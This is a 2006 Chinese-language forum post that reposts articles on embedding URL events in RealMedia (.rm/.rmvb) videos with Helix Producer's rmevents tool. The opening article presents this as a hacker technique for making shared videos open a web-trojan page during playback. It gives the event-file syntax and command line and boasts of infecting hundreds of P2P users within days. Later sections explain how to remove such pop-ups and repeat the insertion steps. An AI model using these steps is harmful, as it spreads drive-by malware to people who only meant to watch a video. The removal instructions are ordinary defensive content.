查看單個文章
舊 2006-07-23, 03:17 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 黑客隱蔽技巧:在Real影片中放置木馬

黑客隱蔽技巧:在Real影片中放置木馬

經常遇到rm影片播放時彈出網頁,一直不知道怎麼回事,前幾天看到了大眾軟體中一篇文章才知道插入和去除的方法,好東東不敢獨享,在網上搜了三篇相關文章,轉給大家拉!

  在Real影片中放 木馬 在P2P軟體裡,很多的Real影片都是危險的,這只是一個小技巧,輔助的一種入侵方式,但這種方法很有效果,比如在著名的A片交流軟體PP點點通裡,我下了一個這樣的小 木馬 ,兩天就有200個目標物,並且呈幾何狀增長.大家別做壞事。 使用Helix Producer Plus 9的rmevents.exe來修改影片的剪輯訊息,可以在指定時間開啟指定的視窗.

  新增一個文本文件rmevents.txt. 輸入: u 00:01:00.0 00:01:30.0 http://yjs.bit.edu.cn/bbs 我來解釋一下,它意思是說在00:01:00.0 00:01:30.0這個時間範圍內開啟後面的URL,後面的URL就是我們的 木馬 位址。 輸入rmevents -i 電影 .rm -e rmevents.txt -o 電影 1.rm 這個指令,產生的 電影 .rm就是我們的 木馬 文件了。 http://yjs.bit.edu.cn/bbs 這個位址是你做好的網頁 木馬 的位址,不管是動鯊 木馬 啊,還是EXE2BMP的 木馬 ,還是什麼CHM 木馬 . 防禦方法更簡單,嘿嘿,不看 電影 就沒事了。要不就不用Realpalyer看吧,換別的播放器。

  去除realoneplay,裡的網頁問題 這個彈出的網頁是由一開始壓制影片的人壓進去的廣告頁。可以通過 Helix Producer Plus V9.01 的rmevents.exe編輯掉。

  方法一: 在你的安裝目錄C:\Program Files\Real\Helix Producer Plus\RealMediaEditor預設值是這個目錄,裡有一個rmevents.exe 在指令提示行cmd.exe下進入這個目錄,執行rmevents.exe 然後 建立一個內容為空的 events.txt 文件 rmevents -i input.rm -e events.txt -o output.rm input.rm為有廣告的原來的rmvb影片。 output.rm為轉換後的新影片名稱。 可以自訂。 這個相當於覆蓋掉原來的Event設定,對RMVB也有效。

  方法二: 直接執行C:\Program Files\Real\Helix Producer Plus\RealMediaEditor目錄下的rmedtgui.exe效果跟上面的指令提示行下是一樣的。 執行rmedtgui.exe後,開啟有廣告的rmvb影片,選項表單裡的tools ——》merge events,開啟新增立的空白events.txt,再在file下選項save as儲存修改好的文件。 Helix Producer Plus V9.01在自由下載提供下載 教你在RM中插入網址 製作開始 先準備個正常的RM文件 下載個Helix Producer Plus 安裝。

  在準備個文本指令文件 文本指令如下 實例:在00:20.0(時分秒毫)—01:10.0時讓欣賞者自動彈出 http://yjs.bit.edu.cn/bbs 主頁 在03:10.0(時分秒毫)—03:59.0時讓欣賞者自動彈出 http://yjs.bit.edu.cn/bbs 主頁 1、編輯事件文件 新增一個記事本文件,命名為event.txt(可隨意),輸入以下內容: u 00:20.0 01:10.0 http://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http://yjs.bit.edu.cn/bbs 儲存碟後結束 解釋:u 表示URL事件, 00:20.0是起啟時間,01:10.0是結束時間,後面是指定的網頁.
  下一步 進入Helix Producer Plus的安裝目錄下的RealMediaEditor子目錄,雙按執行rmedtgui.exe文件,從file表單Open開啟一個Rm文件,從表單欄的tools(工具)中選項Merge Events(合併事件),在彈出的對話視窗中選項剛才編輯的event.txt文件,確定後Rmedtgui開始合併事件,合併結束後,請將含有事件文件的RM文件另行儲存。整個程序應當在15分鍾以內完成,還是相當快的。

  就是這麼簡單!
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次